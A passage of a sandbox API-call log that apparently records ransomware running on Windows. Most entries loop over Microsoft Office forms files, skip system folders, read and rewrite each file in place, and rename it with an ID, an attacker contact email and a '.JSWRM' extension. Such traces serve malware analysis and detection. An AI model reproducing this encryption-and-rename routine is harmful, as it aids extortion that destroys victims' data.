Office\\root\\Office16\\FORMS\\1033\\APPT.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\appt.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.753] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="APPTL.ICO", cAlternateFileName="")) returned 1 [0129.753] lstrcmpiW (lpString1="APPTL.ICO", lpString2=".") returned 1 [0129.753] lstrcmpiW (lpString1="APPTL.ICO", lpString2="..") returned 1 [0129.753] lstrcmpiW (lpString1="APPTL.ICO", lpString2="...") returned 1 [0129.754] lstrcmpiW (lpString1="APPTL.ICO", lpString2="windows") returned -1 [0129.754] lstrcmpiW (lpString1="APPTL.ICO", lpString2="recovery") returned -1 [0129.754] lstrcmpiW (lpString1="APPTL.ICO", lpString2="perflogs") returned -1 [0129.754] lstrcmpiW (lpString1="APPTL.ICO", lpString2="documents and settings") returned -1 [0129.754] lstrcmpiW (lpString1="APPTL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.754] lstrcmpiW (lpString1="APPTL.ICO", lpString2="system volume information") returned -1 [0129.754] lstrcmpiW (lpString1="APPTL.ICO", lpString2="msocache") returned -1 [0129.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPTL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPTL.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPTL.ICO", lpUsedDefaultChar=0x0) returned 9 [0129.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPTL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPTL.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPTL.ICO", lpUsedDefaultChar=0x0) returned 9 [0129.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\APPTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\apptl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.755] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.755] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.755] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0129.756] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.756] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.757] CloseHandle (hObject=0x314) returned 1 [0129.757] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\APPTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\apptl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\APPTL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\apptl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.758] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="APPTS.ICO", cAlternateFileName="")) returned 1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2=".") returned 1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2="..") returned 1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2="...") returned 1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2="windows") returned -1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2="recovery") returned -1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2="perflogs") returned -1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2="documents and settings") returned -1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2="system volume information") returned -1 [0129.758] lstrcmpiW (lpString1="APPTS.ICO", lpString2="msocache") returned -1 [0129.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPTS.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPTS.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPTS.ICO", lpUsedDefaultChar=0x0) returned 9 [0129.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPTS.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPTS.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPTS.ICO", lpUsedDefaultChar=0x0) returned 9 [0129.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\APPTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\appts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.759] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.759] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.759] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.760] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.761] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.761] CloseHandle (hObject=0x314) returned 1 [0129.761] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\APPTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\appts.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\APPTS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\appts.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.762] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="CNFNOT.CFG", cAlternateFileName="")) returned 1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2=".") returned 1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2="..") returned 1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2="...") returned 1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2="windows") returned -1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2="recovery") returned -1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2="perflogs") returned -1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2="documents and settings") returned -1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2="system volume information") returned -1 [0129.762] lstrcmpiW (lpString1="CNFNOT.CFG", lpString2="msocache") returned -1 [0129.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CNFNOT.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CNFNOT.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CNFNOT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\cnfnot.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.763] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=320) returned 1 [0129.763] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.763] ReadFile (in: hFile=0x314, lpBuffer=0x21c578, nNumberOfBytesToRead=0x140, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345e534*=0x140, lpOverlapped=0x0) returned 1 [0129.764] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.764] WriteFile (in: hFile=0x314, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345e530*=0x140, lpOverlapped=0x0) returned 1 [0129.764] CloseHandle (hObject=0x314) returned 1 [0129.764] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CNFNOT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\cnfnot.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CNFNOT.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\cnfnot.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.765] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="CNFNOT.ICO", cAlternateFileName="")) returned 1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2=".") returned 1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2="..") returned 1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2="...") returned 1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2="windows") returned -1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2="recovery") returned -1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2="perflogs") returned -1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2="documents and settings") returned -1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2="system volume information") returned -1 [0129.765] lstrcmpiW (lpString1="CNFNOT.ICO", lpString2="msocache") returned -1 [0129.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT.ICO", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CNFNOT.ICO", lpUsedDefaultChar=0x0) returned 10 [0129.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT.ICO", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CNFNOT.ICO", lpUsedDefaultChar=0x0) returned 10 [0129.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CNFNOT.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\cnfnot.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.767] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.767] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.767] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0129.770] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.770] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.770] CloseHandle (hObject=0x314) returned 1 [0129.771] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CNFNOT.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\cnfnot.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CNFNOT.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\cnfnot.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.771] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7cf588, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7cf588, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="CNFRES.CFG", cAlternateFileName="")) returned 1 [0129.771] lstrcmpiW (lpString1="CNFRES.CFG", lpString2=".") returned 1 [0129.771] lstrcmpiW (lpString1="CNFRES.CFG", lpString2="..") returned 1 [0129.772] lstrcmpiW (lpString1="CNFRES.CFG", lpString2="...") returned 1 [0129.772] lstrcmpiW (lpString1="CNFRES.CFG", lpString2="windows") returned -1 [0129.772] lstrcmpiW (lpString1="CNFRES.CFG", lpString2="recovery") returned -1 [0129.772] lstrcmpiW (lpString1="CNFRES.CFG", lpString2="perflogs") returned -1 [0129.772] lstrcmpiW (lpString1="CNFRES.CFG", lpString2="documents and settings") returned -1 [0129.772] lstrcmpiW (lpString1="CNFRES.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.772] lstrcmpiW (lpString1="CNFRES.CFG", lpString2="system volume information") returned -1 [0129.772] lstrcmpiW (lpString1="CNFRES.CFG", lpString2="msocache") returned -1 [0129.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFRES.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFRES.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CNFRES.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFRES.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFRES.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CNFRES.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CNFRES.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\cnfres.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.773] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=338) returned 1 [0129.773] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.773] ReadFile (in: hFile=0x314, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345e534*=0x150, lpOverlapped=0x0) returned 1 [0129.774] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.774] WriteFile (in: hFile=0x314, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345e530*=0x150, lpOverlapped=0x0) returned 1 [0129.774] CloseHandle (hObject=0x314) returned 1 [0129.774] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CNFRES.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\cnfres.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CNFRES.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\cnfres.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.775] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="CONFLICT.ICO", cAlternateFileName="")) returned 1 [0129.775] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2=".") returned 1 [0129.775] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2="..") returned 1 [0129.775] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2="...") returned 1 [0129.775] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2="windows") returned -1 [0129.775] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2="recovery") returned -1 [0129.775] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2="perflogs") returned -1 [0129.775] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2="documents and settings") returned -1 [0129.775] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.775] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2="system volume information") returned -1 [0129.776] lstrcmpiW (lpString1="CONFLICT.ICO", lpString2="msocache") returned -1 [0129.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONFLICT.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.776] WideCharToMultiByte (in: CodePage=0xfde9, 